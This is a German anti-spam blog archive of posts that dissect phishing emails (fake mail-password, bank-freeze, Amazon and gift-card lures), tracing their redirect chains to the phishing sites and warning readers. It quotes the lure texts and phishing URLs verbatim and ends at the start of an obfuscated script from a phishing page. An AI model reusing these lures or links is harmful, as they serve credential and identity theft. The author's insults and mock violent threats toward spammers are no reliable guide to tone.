Kategoriearchiv „Phishing“

Email Settings

Freitag, 14. August 2020

Im Moment gibt es viel Phishing auf E-Mail-Passwörter. Hier ist ein weiteres Beispiel, wie naive Menschen dazu gedrängt werden, ihr E-Mail-Passwort auf der Website von Spammern und Verbrechern einzugeben:

Von: tamagothi.de <rsisilo@solomons.com>

Ja, schon klar, solomons (punkt) com ist tamagothi (punkt) de! Wenn es hier nur eine informatische Grundbildung in der Bevölkerung gäbe, wenn hier wenigstens ein Wissensstand vorhanden wäre, der den Kenntnissen der Grundrechenarten entspricht, die man als elementares Hilfsmittel zur Kulturteilhabe noch von jedem Sonderschüler erwartet, dann könnte niemand auf dieses Phishing reinfallen. Es gibt diese Grundbildung nicht in der BRD oder in einem anderen „demokratischen“ Staat, dessen gesamtes menschliches Miteinander und gesamte Wirtschaft auf Computern basiert. Sie wird weder schulisch noch wird sie journalistisch vermittelt. Und das ist Absicht. Das ist Vorsatz. Dumm kauft viel und teuer und ist in möglichst vielen wichtigen Dingen maximal abhängig und passiv, so dass man beliebig abzocken kann. Und genau das soll in der „marktkonformen Demokratie“ (A. Merkel) mit allen Mitteln hergestellt werden. 🙁

Aber ich schreibe hier ja über Spam.

Selbst, wenn jeder wie ich einen Anfall spontaner Heiterkeit bekäme: Dann würden die Kriminellen eben eine Mailadresse aus der Domain tamagothi (punkt) de fälschen. Das ist genau so leicht. Aber es wüsste eben auch jeder, dass man als Absender einer E-Mail eintragen kann, was man will, ohne dass sich dadurch etwas am Transport der E-Mail durch das Internet ändert – ganz ähnlich, wie man auch auf einen Briefumschlag jeden beliebigen Absender schreiben kann, und der Brief kommt trotzdem an. Warum sollte er auch nicht? 📬

An: gammelfleisch@tamagothi.de

Im Töpfchen für Sieger! 🚽

E-MAIL SETTINGS

Dear gammelfleisch@tamagothi.de,

NOTE: You have less than 24hrs to confirm your password for your account or you account will be automatically deleted from our system

Confirm password

tamagothi.de will always keep you posted on security updates.

Thanks and Regards,
tamagothi.de (C) 2020 Secured Service.

So so, „you account will be […] deleted“. Grammatik ist schwierig, ich weiß. Vor allem für Spammer, die ihren Text nicht vor dem Absendern noch einmal durchlesen, weil sie ihre Opfer sowieso verachten. 🤡

Wie gesagt, es gibt von diesen Spams im Moment eine Menge. Alle, die ich sehe, sind in englischer Sprache. Die Texte sind sehr ähnlich. Immer soll man in die E-Mail klicken, weil sonst das E-Mail-Konto angeblich ganz schnell grundlos gelöscht wird. Natürlich führt der Link niemals in die Domain der Mailadresse, sondern nach ein paar Umleitungen…

$ location-cascade http://u5774721.ct.sendgrid.net/ls/click?upn=ejNuQA4atNCiKz48cn9lrYmqak1YFT4QN2pRzls7piP9nPh2XZXnp-2FuKiYlTQmWvk99FIVSvmX0saeZ1CHihGbUuOqi1O98FhgsOTKxuAiw-3D33HS_UT8PPIybgQpd36h9oKtu-2BjUzjLfFv7rAGjs-2FGNS0bi8emvtns39b6hyZN5kHjXmTn5IfcOwGbdsCzmuRvPvZscgD-2F8T59hQIaGgLxWXPsmJixpXATEijVWOl0hLl0ok2gc-2Fv6buA6lHBimHM7TsxIY-2B-2F0Dlb2Q2q1k50RFTcmEMVs-2BgWmAejX7nx7ft9s7CDDz1HSedUEEmYLazqU5E03JNVpZZeDPEX3H8OpOMB-2FkY-3D
     1	https://www.presiidio.com/.MDT?i=i&0=gammelfleisch@tamagothi.de
     2	https://www.presiidio.com/.MDT/?i=i&0=gammelfleisch@tamagothi.de
     3	z952yg298hz2zkhipca7wmxczt.php?0=Z2FtbWVsZmxlaXNjaEB0YW1hZ290aGkuZGU=&.verify??guce_referrer=aHR0cHM6Ly9sb2dpbi55YWhvby5jb20v&guce_referrer_sig=AQAAABA99NmGR9iNQOyU5mI3ASjQfYjcPATD_A8modgjxpNXYNmo8n5zxdi8EZV7GFYPzoSc_RpMz0hYfdCk0OLmxnMB6tpfZnd5ENcxTcI3e56K0Vz3pSL6PoIoDveE6VV6vAiBzqdjcYAbAHdiaf7gx2w9XRGmCh4orbe2VcZO9aN_
$ _

…und viel simuliertem „Connecting to server“ mit animiertem Fortschrittsbalken im Browser zur Website in einer völlig anderen Domain, in diesem Fall presiidio (punkt) com. Natürlich hat diese Website nichts mit der Domain der Mailadresse oder mit der Mailadresse selbst zu tun. Dort gibt es die von Kriminellen in E-Mail-Spams verlinkte Gelegenheit, auf einer lustigen, in einer E-Mail-Spam verlinkten Website ohne Impressum…

…das E-Mail-Passwort preiszugeben. Das wäre zwar sehr dumm, aber ich glaube, dass es dennoch eine Menge Menschen getan haben. Und dass es eine Menge Menschen weiterhin tun, denn diese dummen Phishingspams laufen weiter und weiter und weiter. Sie hätten schon längst aufgehört, wenn da aus Spammersicht „nichts mehr käme“. 🙁

Herzallerliebst an der Phishing-Seite ist übrigens das Hintergrundbild mit der lustigen Herkunftsangabe:

Detail aus dem Hintergrundbild der Phishing-Seite: www (punkt) DesktopBackground (punkt) org

Wenn so ein Spammer sich Mühe geben wollte, könnte er ja auch gleich arbeiten gehen. 🛠️

tamagothi.de Email Settings

Dienstag, 11. August 2020

Abt.: Passwort-Phishing 🎣

Von: tamagothi.de <wjack498@yandex.com>

Ah, ja! 🤦🤣

An: gammelfleisch@tamagothi.de

Im Töpfchen für Sieger! 🚽

E-MAIL SETTINGS

Dear gammelfleisch@tamagothi.de,

Please confirm your email password and avoid mail malfunction.

Confirm password

Note: You have less than 24hrs to confirm your password or your account will be automatically deleted from our system
tamagothi.de will always keep you posted on security updates.

Thanks and Regards,
tamagothi.de (C) 2020 Secured Service.

Ich wills mal so sagen: Der Mailserver für die Domain tamagothi.de versendet solche E-Mails nicht. Es handelt sich klar um Phishing nach Passwörtern. Die Anmeldedaten, die man dort in der verlinkten Website eingibt, gehen direkt an spammende Kriminelle, die besser mit Handschellen bedient wären.

Amazon Business: Rechnungen mit ausgewiesener USt

Mittwoch, 5. August 2020

Abt.: Phishing-Alarm! 🎣

Ich bin gar nicht bei Amazon. Aus Gründen. Und mit Business wäre ich dort erst recht nicht.

Aber diese Mail kommt auch nicht von Amazon. Die Links gehen nicht in die Domain von Amazon, sondern in eine obskure Subdomain von apoforw (punkt) eu. Wer auf einen der Links klickt und sich auf der „liebevoll nachgemachten“ Amazon-Website „einloggt“, übergibt sein Amazon-Konto an Kriminelle. Es ist Phishing.

Wenn dieser Newsletter nicht richtig angezeigt wird, klicken Sie bitte hier.

Wenn „Amazon“ zu doof ist, eine E-Mail so zu formatieren, dass sie in brauchbarer Form angezeigt wird, klicken sie bitte auf „Click here“. Aber…

Wenn Sie sich von unserem Service abmelden möchten, klicken Sie bitte auf den Abmeldelink im Impressum des Newsletters.

…klicken sie nicht sofort auf „Click here“, wenn sie nicht noch mehr Müll haben wollen, sondern scrollen sie runter und suchen sie dort mal, wo sie klicken können. 🤦

Ist dieser Absatz aus echten Amazon-Mails übernommen? Wenn ja, dann ist mir Amazon sofort noch unsympathischer als eh schon.

Kauf auf Rechnung, Nettopreise, Mengenrabatte und weitere Vorteile speziell für Unternehmen.

Amazon Business

Ich bin kein Unternehmen. Und ich heiße übrigens auch nicht…

Sehr geehrter Leser,

…einfach „Leser“ mit Nachnamen. Ich nehme mal an, das echte Amazon würde seine Kunden namentlich ansprechen, denn sie sind ja namentlich registriert. Spätestens an der unpersönlichen Anrede wird klar, dass es sich um eine Spam handelt.

kaufen Sie für Unternehmen ein? Dann empfehlen wir Ihnen, zu Amazon Business zu wechseln. Amazon Business ist der gleiche kostenlose Amazon Markplatz, den Sie als Privatkunde schon kennen – nur für Geschäftskunden.

Leider ist der Rechtschreibexperte von Amazon gerade in Quarantäne, und deshalb weiß bei Amazon niemand mehr, wie man „Marktplatz“ schreibt. Und wie man eine Rechtschreibprüfung benutzt, die diesen Vertipper sofort findet, weiß Amazon natürlich auch nicht. Vermutlich kennen die sich mit diesen Computern noch nicht so aus.

Jetzt kostenfrei anmelden ❯

Überflüssig zu erwähnen, dass der Anmeldelink auf die gleiche URI führt wie alle anderen Links auch – und keineswegs zu Amazon. So viele Texte, so wenig verschiedene Linkziele.

Amazon Business bietet besondere Vorteile für den geschäftlichen Bedarf:

Business-Preise und Mengenrabatte

Produkte mit Nettopreisen und USt-Rechnungen zum Download

Kauf auf Rechnung mit 30 Tagen Zahlungsziel*

Zugang zu Millionen von geschäftsrelevanten Produkten

Wenn Sie ein Amazon-Konto haben, können Sie dieses separat beibehalten oder in ein Business-Konto umwandeln. Wechseln Sie jetzt zu Amazon Business.

Wir freuen uns auf Sie.

Ihr Amazon Business-Team

* Die Zahlungsoption Kauf auf Rechnung ist vorbehaltlich positiver Bonitätsprüfung.

Das ist doch toll! Am besten finde ich die Produkte… zum Download. 🖱️🤡

Diese Nachricht wurde Ihnen von einem Anbieter im Auftrag von Amazon Business zugesandt. Details zu unserer Datenschutzerklärung finden Sie hier.

Und das ist noch toller. Amazon kann angeblich nicht mehr selbst E-Mail versenden, sondern braucht dafür irgendwelche Dienstleister und gibt diesen Dienstleistern dann fröhlich die ganze Kundendatenbank zum Vollspammen. Wenn man klickt, kann man auch die Lüge der Datenschutzerklärung lesen. Natürlich führt der Klick auf die gleiche URI wie alle anderen Links auch. Und natürlich hängt da eine eindeutige ID dran, damit die Spammer auch wissen, unter welchen Adressen ihre Spam ankommt, gelesen und beklickt wird, damit sie lernen, wo sich das Spammen lohnt. So etwas nennen sie dann „Datenschutz“. 🤥

Die „wahre Datenschutzerklärung“ zu allen Anbietern gibt es natürlich exklusiv hier auf Unser täglich Spam, und das Lesen lohnt sich. Es könnte allerdings ein bisschen beunruhigen. Aber dafür lernt man, was der überall zugesagte Datenschutz in der Praxis wert ist: Nichts. Im Lande der DSGVO gibt es einen stärker durchgesetzten „Datenschutz“ für Kfz-Kennzeichen als für Menschen. 🙁

Bitte antworten Sie nicht direkt auf diese E-Mail.

Die Absenderadresse ist gefälscht.

Dieser Information wurde an gammelfleisch@tamagothi.de gesendet.

Das steht übrigens auch im Mailheader und muss hier nicht wiederholt werden.

Dieser Newsletter ist ein Service der APOLLON E-MAIL MARKETING LTD
Geschäftsführer: Reza Purrrahim
20-22 WENLOCK ROAD | N1 7GU London | England
Registration Number 12309983

Kontakt: info[at]apollon2go[dot]com Web: www.apollon2go.com

Wenn eure Spam an alle möglichen irgendwo eingesammelten Mailadressen eure „Dienstleistung“ ist, dann will ich eure Unverschämtheit nicht mehr kennenlernen. 💩

Wenn Sie unseren Newsletter in Zukunft nicht mehr erhalten möchten, klicken Sie bitte auf austragen.

Einen Teufel werde ich tun, euch irgendwie mitzuteilen, dass eure Spam ankommt! Ich habe schon genug Spam. 🚽

Hinweis: Ihr Datensatz stammt von APOLLON E-MAIL MARKETING LTD. Gemäß der gesetzlichen Anforderungen in § 7 Abs. 2 Nr. 3 UWG versendet APOLLON E-MAIL MARKETING LTD. diese E-Mail ausschließlich mit Ihrem Einverständnis. Sie können dieses Einverständnis jederzeit und ohne Angabe von Gründen widerrufen. Bitte klicken Sie auf austragen um sich beim Newsletter Service abzumelden. Die Rechtmäßigkeit der Werbung bis zu Ihrem Widerruf bleibt davon unberührt.

Aha, wenn ihr eine Mailadresse irgendwo einsammelt, ist das ein „Einverständnis“ und das ist voll „rechtmäßig“. Interessante Interpretation der geltenden Gesetze. 🖕

Datenschutzhinweis: Verantwortlich ist die Firma APOLLON E-MAIL MARKETING LTD., Kontakt siehe oben. Wir verarbeiten Ihre Daten zum Zwecke der Werbung mit Ihrer Einwilligung (Art. 6 Abs. 1 a, f DSGVO) und speichern diese bis zum Widerruf und dem Ablauf von Verjährungs- und Aufbewahrungsfristen. Sie haben Rechte auf Auskunft, Einschränkung und Widerspruch gegen die Verarbeitung und Datenübertragbarkeit, sowie Beschwerde bei der Aufsichtsbehörde.

Den Spaß, eure mutmaßlich mit einem britischen Pfund „kapitalisierte“ Gesellschaft mit beschränkter Hirnleistung (Limited) mit der Anforderung einer Auskunft nach DSGVO anzuschreiben, erspare ich mir mal. Dafür ist mir einfach die Briefmarke zu teuer, davon kaufe ich mir lieber viereinhalb Kilogramm lecker Nudeln. Das Porto würde tatsächlich teurer als eure mutmaßliche Kapitalisierung. Vermutlich bedarf es eines Einschreibens mit Rückschein, damit wirklich darauf reagiert wird. Oh, wie ich gerade sehe, kennt man im Vereinigten Königreich von Großbritannien gar keine Rückscheine, so dass vermutlich die gesamte Post direkt vom Einwurfschlitz in den Mülleimer geht. Spammer kennen keine erfreuliche Kultur. Obwohl es mich wirklich juckt, mal einen Beleg für „meine Einwilligung“ zu sehen… 🙃

Delivery Notification: 5 messages to gammelfleisch@tamagothi.de delayed for 48 hours

Mittwoch, 15. Juli 2020

Abt.: Schlechtes Phishing 🎣

Von: tamagothi.de <info@winnwinnllc.ga>

Das muss schon doof sein, wenn man doof wie ein Spammer ist. Da könnte der Idiot jetzt jeden beliebigen Absender fälschen, zum Beispiel auch einen mit admin oder postmaster in der Tamagothi-Domain, aber was macht er: Er schreibt da einen Absender aus einer völlig anderen Domain rein, so dass ich sofort einen Anfall von Heiterkeit bekomme. 😀

Message generated from tamagothi.de source.

You have some pending messages

„Wow“! Einfach nur „Wow“! 🤦‍♂️🤦‍♀️🤦🏿‍♂️🤦🏿‍♀️

Dieser Blogeintrag, werter Spammer, wurde übrigens vom lieben Gott, dem Administrator des Kosmos, höchst persönlich erzeugt, und er enthält eine wesentliche Mitteilung für dich: Dein antisoziales, kriminelles, madenhaftes Leben wird in Kürze beendet und durch einen immerwährenden Höllenaufenthalt (im siedenden Pool aus Eiter, Erbrochenem und Scheiße, unterstützt von lauter spitzen und scharfen Aua-Gegenständen mit widerlich fleischreißenden Widerhaken) ersetzt, wenn du es nicht binnen zweier Stunden änderst. 💀🔥

Die Nachricht ist aus göttlichen Quellen erzeugt. Sie sagt es ja selbst von sich. Wer könnte da noch zweifeln?! 🛡️🏅

Glaub lieber dran! Die Ewigkeit ist eine verdammt lange Zeit. 😇

Your emails on gammelfleisch@tamagothi.de have been bIocked 7/15/2020 1:09:46 a.m. (EDT). due to authentication error in your domain.

Get all emails unbIocked by following below buttons.

RELEASE MESSAGES PREVIEW HERE::..

Ich will es mal so sagen: Der Link geht nicht etwa in die Domain meiner Mailadresse, sondern zu storage (punkt) googleapis (punkt) com – schön, dass man endlich auch beim Phishing volle Cloud-Unterstützung hat.

Microsoft inc © 2019: We are here to serve you better.

Klar, Microsoft verwendet Google und nicht seinen eigene Cloud-Müll, und Microsoft betreibt neuerdings auch meinen Mailserver. Das passt vortrefflich dazu, dass nicht einmal die Angabe des Jahres stimmt. 🗓️

Microsoft ist an vielem schuld, aber nicht an dieser Spam. Die hat niemals einen Server von Microsoft gesehen. Aber hey, „geistiges Eigentum“ auf eine Drecksspam! Mit „Microsoft“ als Verstärker. Komm doch, Spammer, komm und verklag mich für mein Vollzitat. Ich freue mich schon auf dich! Und Microsoft und Google freuen sich sicherlich auch schon… 🍽️

Aber wie sagte ich eingangs: Es ist schlechtes Phishing. Also noch schlechter als der Durchschnitt des Phishings. Dieser sieht beim Phishing auf Mailadressen anderer Leute ungefähr so aus, wie er Ende Juni bei mir ankam.

Ihr Konto wurde soeben eingefroren

Samstag, 11. Juli 2020

Was für ein Konto wurde denn heute ins Gefierfach gelegt? ❄️

Von: VR-Kundenservice <joachim.kling@kling-kom.de>

Aha, ein Konto von Kling-Kom. Da habe ich aber gar keines. 🙃

Natürlich ist die Absenderadresse gefälscht, und der angegebene Absender hat nichts mit dieser Spam zu tun. Man kann bei E-Mail jeden beliebigen Absender eintragen, ganz genau so, wie man auf einen Briefumschlag jeden beliebigen Absender draufschreiben kann. Das ändert nichts am Transport der E-Mail. Und man braucht keine Hackerkenntnisse dafür. Jedes experimentierfreudige Kind hat in nur zwei Minuten sein Erfolgserlebnis. 👍

Um so erstaunlicher, dass Phisher meist zu blöd sind, eine Absenderadresse einzutragen, die wenigstens ein bisschen überzeugend aussieht. Aber was solls, es kann ja auch nicht jeder Mensch intelligent sein. 🎃

Sehr geehrte Kundin, sehr geehrter Kunde

Aber mal wieder ganz genau mein Name! Eines von den beiden Geschlechtern bin ich. Nur Kunde bin ich nicht. 👏

Ihr VR-Konto wurde soeben eingefroren.

Huch, ein VR-Konto? Ich lese da ja virtual reality, aber die Volks- und Raiffeisenbanken – hier bewusst nicht verlinkt, weil ihre Website die Menschen dazu nötigt, auch dann Sicherheitseinstellungen des Webbrowsers zu lockern, wenn sie sich dort nur informieren wollen¹ – treten ja unter der Domain vr (punkt) de auf.

Ihr Konto wurde für eine zufällige Überprüfung Ihrer persönlichen Daten ausgewählt.

Oh, die Banken machen lustige Würfelspiele, um Konten für irgendwelche Überprüfungen auszuwählen, und dann kommen sie einem mit lustigen Mails und willkürlich-technokratischen Kontensperrungen auf Grundlage irgendwelche Würfelergebnisse? 🎲

Wir sind stets bemüht und gesetzlich verpflichtet die Daten unserer Kunden auf dem neusten Stand zu halten und diese regelmäßig zu Überprüfen. Bei Ihrem Konto liegt die letzte Überprüfung nun mehr als 6 Monate in der Vergangenheit somit kann nicht mehr gewährleistet werden, dass alle Daten wie bspw. die Mobilfunknummer noch auf dem neusten Stand sind.

Aber einige eurer Kunden haben gar keine Mobilfunknummer, sondern einfach nur ein Bankkonto… 🤦

Um Ihr Konto wieder freizuschalten bitten wir Sie die Überprüfung umgehend durchzuführen. Tun Sie dies nicht bleibt Ihr Konto weiterhin eingefroren und wird nach Ablauf einer Frist von 48 Stunden ab jetzt geschlossen. Bitte beachten Sie bis zur Durchführung der Überprüfung können Sie keine Zahlungen senden und empfangen.

Aha, und in einem Anfall völliger Kundenverachtung sperren diese tolle Banken aus der tollen Phantasie eines Spammers einfach nach einem kleinen Würfelspiel für die Zufallsauswahl die Konten ihrer Kunden und lassen ihre Kunden nicht mehr an ihr Geld kommen. Man muss nicht länger als eine Minute darüber nachdenken, um zu bemerken, dass das Bullshit ist, der sogar strafrechtliche Relevanz und in der Folge Schadenersatzansprüche gegenüber der Bank zur Folge hätte, wenn er stimmte. Aber der Spammer wendet sich ja nicht an Denkende, sondern an Dumme, und die sollen jetzt…

zum Formular

…in eine Spam klicken. 🖱️

Natürlich geht der Link nicht in eine Domain der Volks- und Raiffeisenbanken, sondern in die ungleich weniger Vertrauen erweckende Domain vitry (punkt) com, wo man der angeblichen „Volks- und Raiffeisenbank“ eine Menge Daten noch einmal geben könnte, welche die Bank schon kennt. Natürlich hat die verlinkte Seite nichts mit den Volks- und Raiffeisenbanken zu tun. Alle dort angegebenen Daten gehen direkt an gewerbsmäßige Betrüger, die das Konto, die Kreditkarte und die angegebenen persönlichen Daten für allerlei Betrugsgeschäfte nutzen werden, so dass man noch jahrelang Ärger damit hätte, wenn man darauf hereingefallen wäre. 🎣

Deshalb klickt man auch nicht in solche E-Mails. 🛑

Denn zum Glück gibt es einen einfachen und hundertprozentig wirksamen Schutz vor Phishing: Einfach niemals in eine E-Mail klicken. Websites wie die der eigenen Bank immer nur über ein Lesezeichen des Webbrowsers aufrufen, und schon ist es solchen Betrügern unmöglich, jemandem einen giftigen Link unterzuschieben, auf den vielleicht der eine oder andere Mensch unter Stress und Zeitdruck auch einmal hereinfallen könnte. Wenn man das Lesezeichnen im Webbrowser benutzt und nach seiner Anmeldung keinen Hinweis auf das in der Mail behauptete Problem sieht, hat man einen kriminellen Angriff erfolgreich abgewehrt. So einfach geht das. 🛡️

Wir danken Ihnen für Ihre Mithilfe und bitten um Ihr Verständnis.

Nur echt mit einem pseudohöflichen „Dank für Nichts“. 🖕

Mit freundlichen Grüßen,
Ihr VR-Kundenservice

Freundlich wie eine Ohrfeige
Ihr Phishing-Spammer

¹Ich hoffe, dass so ein asoziales und kriminalitätsförderndes Verhalten wie unnötig erzwungenes Javascript noch dazu führt, dass es signifikante Gewinneinbrüche und einer zerstörte Reputation gibt – vor allem in Kontexten, die doch etwas empfindlicher sein sollten. Die Veröffentlichung von Text, der einfach zum Webbrowser übertragen und dort dargestellt wird, ist seit 1993 Kernfunktionalität des Webs. Man muss das nicht ohne Not in Javascript neu implementieren. Zumal so ein Bullshit auch blinde und schwer körperbehinderte Menschen explizit auslädt, also nicht nur verschwenderisch ist und durch unnötige Komplexität Probleme bereitet, sondern auch eine schwere kaufmännische Idiotie der kundenabschreckenden Form darstellt. Allein durch ihren derzeitigen Webauftritt sind die Volks- und Raiffeisenbanken eben in meinem Ansehen stark gesunken und ich würde Menschen deshalb von Geschäftsbeziehungen zu diesen Banken abraten. Ich hätte das übrigens auch gern in Form einer E-Mail mitgeteilt, wurde jedoch von den Volks- und Raiffeisenbanken daran gehindert, weil ich ohne Javascript keinen Zugriff auf das Impressum der Website bekam. Liebe Abmahnanwälte, nutzt eure Chance!

Diese Spam ist ein Zustecksel meines Lesers A. H.

We wish to send You a gift-card

Mittwoch, 8. Juli 2020

Von: Amazon <pjwsggjv@ticonsiglio.online>

So so, Amazon. Dass die aber auch immer noch keine eigene Domain haben! 😀

amazon

gives
10 000 Gift Card

Lustig, die verschenken wegen der Reklamewirkung Karten zum Umsonsteinkaufen, aber machen gar keine Reklame damit, so dass es gar keine Reklamewirkung gibt. Und schließlich kommen diese Karten sogar bei mir an, der ich mit Amazon aus vielerlei Gründen weder etwas zu tun habe noch jemals etwas zu tun haben will. Was diese Gründe sind? Na, nehmt mal die Suchmaschine eures Vertrauens¹ und sucht mal raus, wie Amazon seine Mitarbeiter miss… ähm… behandelt und „entlohnt“! Das ist angesichts des Reibachs, den dieser… sorry… vampiristisch-ausbeuterische Scheißladen macht, einfach nur widerlich und asozial. Ich wünsche mir eine Zeit zurück, in der solche vampiristischen Ausbeuter bestreikt und boykottiert werden, bis sie in den Rahmen einer erträglicheren Werteordnung zurückkehren, statt dass man für eine Handvoll eingesparter Groschen die noch bestehenden Alternativen kaputtgehen lässt. 🙁

Aber es geht hier ja gar nicht um Amazon, sondern um eine Spam, die gar nicht von Amazon kommt. Eine Spam, die bei jedem ankommen kann. Sogar bei mir. Die Geschenkkarte, mit der hier Menschen zum Klick in eine Spam gebracht werden sollen, ist natürlich eine Lüge. 🎣🤥

Your gift card is awaiting for You
face value of gift cards is 15$, 30$ and 50$
Amazon, Steam, Itunes, PlayStation, Xbox, Paypal, Spotify & GooglePlay gift cards avalible

Receive a gift card

Natürlich geht der Link nicht zu Amazon, denn die Spam kommt ja auch gar nicht von Amazon, sondern in ein mutmaßlich gecracktes WordPress-Blog, weil Spammer und Werber nicht so gern direkte Links setzen. Von dort geht es dann weiter zu…

$ lynx -mime_header http://jegyvasarlas.tropicarium.hu/wp-content/mailr.php | grep -i ^location:
Location: http://amozon.info/
$ _

…“Amozon“, nicht zu Amazon. Dort gibt es eine impressumslose Website, auf der man angeblich allerlei Geschenkkarten geschenkt bekommen kann:

Screenshot der betrügerischen Website

Wer darauf reinfällt, bekommt eine ordentliche Portion Javascript-Blendwerk zu sehen und soll anschließend…

…auf einer impressumslosen Website ohne Datenschutzerklärung, die in einer E-Mail-Spam verlinkt wurde, einen Datenstriptease vor irgendwelchen Unbekannten machen, weil die ihm so schön in der E-Mail und mit ihrem Javascript-Getue belogen haben. Anzugeben sind dabei Name, Vorname, E-Mail-Adresse, Anschrift, Wohnort, Land, Staat, Postleitzahl und Telefonnummer. Wer mir nicht glaubt, dass das eine ganz schlechte Idee ist – ich bin ja nur ein dahergelaufener Blogger und so ein asozialer E-Mail-Spammer ist ja viel vertrauenswürdiger – frage bitte einfach mal bei der Polizei! 👮

Aber nicht darauf reinfallen! ⛔

Was Verbrecher mit den Daten machen? Die Identität irgendwelcher Dritter für betrügerische Geschäfte aller Art missbrauchen. Deshalb gibt man nicht jedem Honk mit Website seine persönlichen Daten und ist nach Möglichkeit auch bei angesehenen Unternehmen sehr zurückhaltend mit jeder Datenpreisgabe. Dass man selbst mit seinen Daten sparsam umgeht, ist nämlich der einzige Datenschutz, der auch funktioniert. Alles andere sind billige Worte und/oder Glauben an die Versprechen eines Dritten in einem technischen und anonymisierenden Medium. Und daran zu glauben ist eben nicht so schlau. 🤔

Ich habe mir das nicht weiter angeschaut, aber ich wäre nach dieser ganzen Präsentation keineswegs überrascht, wenn man im nächsten Schritt auch noch irgendwo klicken muss, „um seine Angaben zu verifizieren“ oder „um den Hack freizuschalten“, und damit ist dann ein Abonnement verbunden, zum Beispiel für Händi-Nichtswertdienste (man soll ja auch seine Telefonnummer angeben). So ein Abonnement kostet schnell mehr als zwanzig Euro im Monat, ist aber gar nicht mehr so leicht abzubestellen, wenn man nicht weiß, wie und bei wem man es „bestellt“ hat. Oder vielleicht auch fünf davon. Affiliate-Geld nehmen Spammer ja auch immer wieder gern, und irgendwelche halbseidenen Klingeltonkönige sind nicht sehr wählerisch in der Auswahl ihrer Affiliates. Leider sind sie nicht haftbar für die Taten ihrer Geschäftspartner, und deshalb wird diese Art Geschäft mithilfe krimineller Spammer wohl auch noch so lange laufen, bis die Mutter der Dummen nicht mehr schwanger wird. 🤰

Von der völlig korrupten Politik und ihrem „Verbraucherschutz“ brauchen wir in der „marktkonformen Demokratie“ (A. Merkel) gar nichts zu erwarten, und genau so wenig von den diversen Unternehmen, die für ein paar Cent Gewinn jede erfreuliche Zivilisation und Zurückhaltung hinter sich lassen. Außer vielleicht, dass das Internet immer umständlicher und nerviger in der alltäglichen Benutzung wird, wenn es schon keinen gesetzlichen Schutz vor asozialen und abzockerischen Machenschaften aller Art gibt. Niemand müsste jemals eine Cookie-Warnung² wegklicken, wenn site-übergreifendes Tracking ganz einfach verboten und energisch strafverfolgt würde. Und ich müsste für dieses kaum Daten speichernde Blog keine Datenschutzerklärung schreiben, wenn Stalking auch im Internet eine Straftat wäre, und nicht etwas, was man mit einem erzwungenen Klick auf die Lüge ☑️ „Ich habe die Erklärung zum Datenschutz und die Nutzungsbedingungen gelesen und bin damit einverstanden“ automatisch legalisieren kann. 🤮

Ach! 🤬

In collaboration with a marketing blog:
http://jegyvasarlas.tropicarium.hu/wp-content/mailr.php

Wenn man einen Blog anderer Leute crackt, nennt man das heute „Zusammenarbeit“. In diesem Sinne, Spammer, möchte ich gern mal mit dem stumpfen Gegenstand bei dir vorbeischauen und ein bisschen mit dir zusammenarbeiten. 🥊

Sponsored by: https://www.amazon.com

Diese E-Mail-Spam hat auf ihrem Weg durch das Internet niemals einen Server von Amazon gesehen. Aber was erwartet man von Spammern und Lügnern?

¹Ich empfehle immer noch DuckDuckGo.

²Inzwischen spielen Cookies für das site-übergreifende Tracking nur noch eine untergeordnete Rolle. Wer Javascript zulässt, liefert eine hinreichend eindeutige ID über Browser-Fingerprinting. Trotzdem sind die Gesetze gegen Cookie-Missbrauch weiterhin in Kraft. So ist das eben, wenn man nicht die Krankheit kurieren will, sondern nur die Symptome.

Fix pending mail issue.

Montag, 29. Juni 2020

Nicht drauf reinfallen, es ist Phishing! 🚨

Von: Web Admin <uk@fascil.shop>

Hier spammt der Administrator noch selbst, und…

An: gammelfleisch@tamagothi.de

…weil er das ganze Web nach irgendwelchen Mailadressen durchsucht, landet er mit seinem kriminellen Kommunikationsversuch auch prompt im Töpfchen für Sieger. 🚽

You have new pending messages

Echt? 🕵️

$ ssh -l name mailserver.example.org
name@mailsever.example.org $ mailq
Size             Queue ID                                                    Date
User             From
Status           Recipient
---------------- ---------------------------------------------------------
   0 messages.
name@mailsever.example.org $ _

Nein, habe ich nicht. Der Spammer lügt. 🤥

Dear gammelfleisch@tamagothi.de

Aber so was von ganz genau mein Name mal wieder! 👏

You have 7 New pending mails under the tamagothi.de mail network server. Your mail version 2.0.1 is currently being discontinued from receiving incoming e-mail, and will no longer work 48 hours from 6/27/2020

Was lernen wir aus diesem kurzen Absatz?

Sieben E-Mails können angeblich nicht zugestellt werden. ✉️
Das liegt daran, dass ich immer noch Mail in der Version 2.0.1 verwende, und das kriegt jetzt völlig grundlos keine Mail mehr. 🖕
Wenn ich jetzt nicht von Unkenntnis und Panik getrieben ganz schnell und völlig hirnlos reagiere, funktioniert E-Mail in ein paar Minuten gar nicht mehr für mich. Und zwar ebenfalls grundlos. 🥊🧠

Das ist natürlich Quatsch. Die Protokolle SMTP, IMAP und POP3 sind seit Jahrzehnten praktisch unverändert. Allerdings wurde immer wieder einmal eine kleinere Erweiterung angeflanscht, am häufigsten wohl an SMTP… 😉

Es werden also keine neuen „Mailversionen“ benötigt, um auf E-Mail zuzugreifen. Wenn ich es wollte, könnte ich wohl immer noch mit zehn Jahre alter Mailsoftware meine E-Mail erledigen. Aber wer will schon mit uralten Programmen voller ungefixter Sicherheitslöcher im Internet unterwegs sein, wenn es auch gute aktuelle Software gibt? ☠️

Dieser spammende „Web Admin“ lügt. Das von ihm behauptete Problem existiert nicht. Sein Gefasel soll nur Menschen mit geringen technischen Kenntnissen verblenden, erschrecken und unter gefühlten Zeitdruck setzen, damit sie jetzt klicken:

To retrieve your messages and upgrade to version 5.0.1, kindly follow the information below.

RESTORE MESSAGES NOW

Wer da klickt, lasse alle Hoffnung fahren! 🖱️🔥

$ lynx -mime_header https://wbbw3902889101.us-south.cf.appdomain.cloud/?35d44a299d135d44a299d1a2ba7c89f62ca2ba7c89f62c#gammelfleisch@tamagothi.de:35d44a299d1a2ba7c89f62c=377237g-
HTTP/1.0 200 OK
X-Backside-Transport: OK OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 29 Jun 2020 11:32:47 GMT
Server: Apache
Vary: Accept-Encoding
X-Global-Transaction-ID: 0d28ff5e5ef9d15f91a769e7
Connection: close
Content-Length: 2426

<script type="text/javascript">
  document.write(
    unescape(
